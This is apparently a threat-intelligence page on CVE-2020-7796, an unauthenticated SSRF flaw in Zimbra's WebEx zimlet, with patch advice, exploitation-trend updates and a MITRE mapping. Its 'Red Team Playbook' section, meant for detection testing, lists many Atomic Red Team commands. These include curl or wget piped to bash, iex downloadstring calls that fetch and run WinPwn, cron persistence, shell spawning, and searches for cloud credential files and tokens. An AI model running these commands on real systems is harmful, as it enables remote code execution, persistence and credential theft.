CVE-2020-7796
Overview
This vulnerability is a server-side request forgery (SSRF) flaw resulting from improper validation of user-supplied input in the WebEx zimlet component of Zimbra Collaboration Suite. The root cause lies in the zimlet's JSP endpoint which processes the 'companyId' parameter without adequate sanitization, enabling crafted HTTP requests to be sent from the server. The affected component is the com_zimbra_webex zimlet's httpPost.jsp within versions prior to 8.8.15 Patch 7.
Vulnerability Description
Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
Impact
An unauthenticated attacker can leverage this SSRF vulnerability to make arbitrary HTTP requests from the Zimbra server, potentially accessing internal resources or services not exposed externally. This can lead to unauthorized data disclosure or facilitate further attacks such as internal network reconnaissance and exploitation of trust relationships. No user interaction or authentication is required to exploit this flaw, increasing its severity in environments with exposed zimlet functionality.
Solution
Remediation involves upgrading Zimbra Collaboration Suite to version 8.8.15 Patch 7 or later, as detailed in the official Zimbra release notes at https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7. This patch addresses the SSRF vulnerability by correcting input validation in the WebEx zimlet JSP. Administrators should follow the vendor's patching instructions precisely to ensure the vulnerability is fully mitigated.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Zimbra Collaboration Suite (ZCS) is characterized by a Server-Side Request Forgery (SSRF) flaw that arises when the WebEx zimlet is installed alongside the enabled zimlet JSP. This issue allows an attacker to manipulate the server into making requests to internal or external resources that the server has access to, potentially exposing sensitive information or services. The SSRF vulnerability is particularly concerning as it can be exploited without requiring authentication, allowing unauthenticated users to craft malicious requests that the server unwittingly executes. This flaw is exacerbated by the fact that many organizations rely on ZCS for critical collaboration and communication functions, making it a prime target for attackers.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage the WebEx zimlet to send crafted requests that target internal services, such as databases or internal APIs, which are typically not exposed to the public internet. For example, an attacker could retrieve sensitive data from a database management system or interact with internal services, leading to unauthorized access or data leakage. Additionally, the attacker could use the SSRF to perform port scanning on internal networks, identifying other vulnerable services that could be further exploited. This multi-faceted approach to exploitation underscores the severity of the vulnerability and the potential for significant damage.
The real-world impact of this vulnerability is profound, particularly for organizations that utilize ZCS for their operations. The high CVSS score of 9.8 indicates that the risk is critical, and successful exploitation could lead to severe consequences, including data breaches, unauthorized access to sensitive information, and potential compliance violations. The business risks associated with such incidents are substantial, encompassing financial losses, reputational damage, and the costs associated with incident response and remediation. Organizations may also face regulatory scrutiny if sensitive data is compromised, leading to further financial and operational repercussions.
To detect and mitigate this vulnerability, organizations should adopt a multi-layered approach. First, it is crucial to ensure that the Zimbra Collaboration Suite is updated to the latest version, specifically version 8.8.15 Patch 7 or later, which addresses this vulnerability. Regular patch management practices should be implemented to keep all software components up to date. Additionally, organizations should conduct thorough security assessments, including vulnerability scanning and penetration testing, to identify any potential exposure to SSRF vulnerabilities. Network segmentation can also be an effective strategy, limiting the ability of attackers to reach sensitive internal services even if they exploit the SSRF flaw.
In conclusion, the SSRF vulnerability in the Zimbra Collaboration Suite presents a significant threat to organizations that rely on this software for collaboration and communication. The potential for exploitation without authentication, coupled with the ability to access internal resources, makes this vulnerability particularly dangerous. Organizations must prioritize detection and mitigation strategies, including timely updates and robust security practices, to safeguard against the risks posed by this vulnerability. By taking proactive measures, businesses can protect their sensitive information and maintain the integrity of their operations in an increasingly complex threat landscape.
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2020-7796, evidenced by its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. This formal recognition underscores the vulnerability’s criticality and signals increased attention from both defenders and potential adversaries. Concurrently, the CVSS score has been updated to 9.8, reflecting a reassessment of the vulnerability’s impact and exploitability, while the EPSS score has surged to 0.9285, indicating a high likelihood of exploitation in the near term. Our telemetry corroborates this trend, showing a sharp increase in detection activity, although no new exploit variants or ransomware affiliations have been observed to date. This shift elevates the threat level substantially, emphasizing that organizations using affected Zimbra Collaboration Suite versions face a heightened risk of server-side request forgery attacks that could facilitate unauthorized internal network access. The convergence of these factors demands increased vigilance from defenders, as the vulnerability’s exploitation potential is now both quantitatively and qualitatively more pronounced.
Update 2 — April 16, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2020-7796, with telemetry indicating a doubling in detection frequency over a short interval. Although no novel exploit techniques or ransomware affiliations have surfaced, this increase signals a growing interest or opportunistic scanning targeting vulnerable Zimbra Collaboration Suite deployments. The sustained high EPSS score underscores the vulnerability’s persistent exploitability in the wild. For defenders, this trend elevates the urgency of monitoring for SSRF attempts leveraging the WebEx zimlet component, as attackers may be intensifying reconnaissance or preliminary exploitation efforts. Consequently, the threat level associated with this vulnerability has shifted from latent to actively exploited, warranting heightened situational awareness despite the absence of new exploit variants.
Update 3 — June 09, 2026
CSURFACE threat intelligence has identified a moderate uptick in activity exploiting CVE-2020-7796, reflected by a discernible increase in detection events and a slight rise in the EPSS score. This trend indicates that adversaries continue to probe and potentially leverage the SSRF vulnerability associated with the WebEx zimlet in Zimbra Collaboration Suite environments. Although no novel exploit variants have been documented, the persistence and incremental growth in exploitation attempts suggest sustained attacker interest and possible reconnaissance intensification. For defenders, this evolving landscape underscores the need for continued vigilance, as the vulnerability remains a viable vector for unauthorized access or lateral movement within affected networks. Consequently, the threat level is elevated from a dormant to a more active exploitation state, reinforcing the criticality of monitoring and response capabilities focused on SSRF activity linked to this vulnerability.
Update 4 — June 20, 2026
CSURFACE threat intelligence has detected a slight increase in activity linked to CVE-2020-7796, reflecting a modest resurgence in exploitation attempts targeting the Zimbra Collaboration Suite SSRF vulnerability. Although the EPSS score has marginally declined, indicating a subtle reduction in predicted exploit likelihood, our telemetry reveals a concurrent uptick in detection events, suggesting that adversaries may be intensifying reconnaissance or probing efforts rather than executing widespread attacks. This divergence between statistical exploit probability and observed activity highlights a nuanced threat environment where attackers maintain interest but have not significantly expanded operational use. For defenders, this means the vulnerability remains a pertinent risk requiring ongoing monitoring, as the increased probing could precede more aggressive exploitation phases. The overall threat level is adjusted to reflect sustained attacker engagement with a cautiously elevated alert posture, emphasizing the importance of vigilance despite the absence of new exploit variants or ransomware associations.
Update 5 — July 06, 2026
CSURFACE threat intelligence has detected a slight increase in probing activity targeting CVE-2020-7796, indicating sustained adversary interest in this critical Zimbra Collaboration Suite vulnerability. Although no new exploit variants or ransomware associations have surfaced, the uptick in detection frequency suggests attackers are continuing reconnaissance efforts, potentially preparing for more aggressive exploitation attempts. This persistent probing underscores the vulnerability’s attractiveness as an attack vector, particularly given its high severity rating and the presence of the WebEx zimlet component in affected environments. While the EPSS score remains stable and no rapid escalation in exploit development is evident, the observed telemetry trend warrants a cautiously elevated risk posture. Defenders should recognize that the vulnerability remains actively targeted, and the incremental increase in activity could presage a shift toward more impactful exploitation campaigns.
Update 6 — July 31, 2026
CSURFACE threat intelligence has detected a modest increase in activity targeting CVE-2020-7796, reflected by a slight uptick in telemetry despite a marginal decline in the EPSS score. This divergence suggests that while exploit attempts remain steady or are incrementally rising, the overall likelihood of widespread exploitation may be stabilizing or slightly diminishing. The absence of new exploit techniques or ransomware group involvement indicates that adversaries continue to probe this vulnerability primarily for reconnaissance or opportunistic access rather than coordinated campaigns. For defenders, this nuanced shift underscores the importance of maintaining vigilance, as persistent low-level targeting can precede more aggressive exploitation efforts. The risk level remains high due to the vulnerability’s critical severity and the presence of the WebEx zimlet, but the current data does not indicate an imminent surge in exploit sophistication or volume.
Update 7 — August 18, 2026
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2020-7796, indicating a modest rise in attempts to leverage this SSRF vulnerability in Zimbra Collaboration Suite environments where the WebEx zimlet is enabled. While the overall exploit landscape remains unchanged with no new proof-of-concept exploits or ransomware group involvement identified, this subtle uptick suggests continued adversary interest in probing this vector for opportunistic access. The stable EPSS score reinforces that the likelihood of exploitation remains consistently high, reflecting the vulnerability’s critical severity and persistent presence in targeted environments. For defenders, this development underscores the necessity of sustained monitoring and vigilance, as even minor increases in probing activity can precede more aggressive exploitation or integration into broader attack campaigns. The threat level remains elevated, with the incremental rise in detection activity signaling that adversaries have not deprioritized this vulnerability despite the absence of novel exploitation techniques.
Affected Products (8)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Synacor | Zimbra Collaboration Suite | All |
cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:-:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p1:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p2:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p3:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p4:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p5:*:*:*:*:*:*
|
|
|
Synacor | Zimbra Collaboration Suite | 8.8.15 |
cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p6:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
16 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-664 | Server Side Request Forgery |
30%
|
High | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-7796 |
| wiki.zimbra.com |
GitHub CVE
x_refsource_CONFIRM
|
https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-7796 |